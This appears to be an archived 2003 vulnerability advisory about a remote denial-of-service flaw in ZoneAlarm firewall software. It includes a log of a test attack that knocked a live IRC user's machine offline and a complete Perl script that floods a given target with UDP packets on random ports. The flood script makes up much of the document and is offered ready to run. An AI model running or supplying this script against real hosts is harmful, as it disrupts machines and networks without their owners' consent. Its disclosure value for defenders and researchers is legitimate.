ZoneAlarm remote Denial Of Service exploit

Type securityvulns
Reporter Securityvulns
Modified 2003-09-03T00:00:00


Overview :

ZoneAlarm is a firewall software

package designed for Microsoft Windows

operating systems that blocks intrusion

attempts, trusted by millions, and has

advanced privacy features like worms,

Trojan horses, and spyware protection.

ZoneAlarm is distributed and maintained

by Zone Labs.

Details :

ZoneAlarm was found vulnerable to a

serious vulnerability leading to a

remote Denial Of Service condition due

to failure to handle udp random

packets, if an attacker sends multiple

udp packets to multiple ports 0-65000,

the machine will hang up until the

attacker stop flooding.

The following is a remote test done

under ZoneAlarm version 3.7.202 running

on windows xp home edition.

on irc test1 joined running ZoneAlarm

version 3.7.202 with default


* test1 (test@62.251.*.) has joined #Hackology

from a linux box :

[root@mail DoS]# ping 62.251.*.

PING 62.251..* (62.251..*) from

... : 56(84) bytes of data.

--- 62.251.*. ping statistics ---

7 packets transmitted, 0 received, 100%

loss, time 6017ms

on irc

-> [test1] PING

[test1 PING reply]: 1secs

Host is firewalled and up

now lets try to dos

--- ZoneAlarm Remote DoS Xploit


--- Discovered & Coded By _6mO_HaCk

[] DoSing 62.251.. ... wait 1

minute and then CTRL+C to stop

[root@mail DoS]

after 2 minutes

* test1 (test@62.251.*.) Quit (Ping timeout)

I have made the same test on ZoneAlarm

Pro 4.0 Release running on windows xp

professional and i've got the same


Exploit released : 02/09/03

Vulnerable Versions : ALL

Operating Systems : ALL Windows

Successfully Tested on :

ZoneAlarm version 3.7.202 / windows xp

home edition / windows 98.

ZoneAlarm Pro 4.0 Release / windows xp


Vendor status : UNKOWN

Solution : Shut down ZoneAlarm and wait

for an update.

The following is a simple code written

in perl to demonstrate that, the code

is clean, it wont eat your cpu usage

and it doesnt need to be run as root

but you still have to use it at your

own risk and on your own machine or

remotly after you get permission.

Big thanx go to D|NOOO and frost for

providing me windows boxes with

zonealarm for testing

Greetz to ir7ioli, BlooDMASK

NRGY, Le_Ro| JT ghosted_ Securma,

anasoft SySiPh, phrack, DeV|L0Ty,

MajNouN |BiG-LuV| h4ckg1rl and all

my ppl here in Chicago and in Morocco

Comments suggestions or additional info

feel free to contact me at


use Socket;

system(clear); print "\n"; print "--- ZoneAlarm Remote DoS Xploit\n"; print "---\n"; print "--- Discovered & Coded By _6mO_HaCk\n"; print "\n"; if(!defined($ARGV[0])) { &usage }

my ($target); $target=$ARGV[0];

my $ia = inet_aton($target) || die ("[-] Unable to resolve $target");

socket(DoS, PF_INET, SOCK_DGRAM, 17); $iaddr = inet_aton("$target");

print "[*] DoSing $target ... wait 1 minute and then CTRL+C to stop\n";

for (;;) { $size=$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand; $port=int(rand 65000) +1; send(DoS, 0, $size, sockaddr_in($port, $iaddr)); } sub usage {die("\n\n[*] Usage : perl $0 <Target>\n\n");}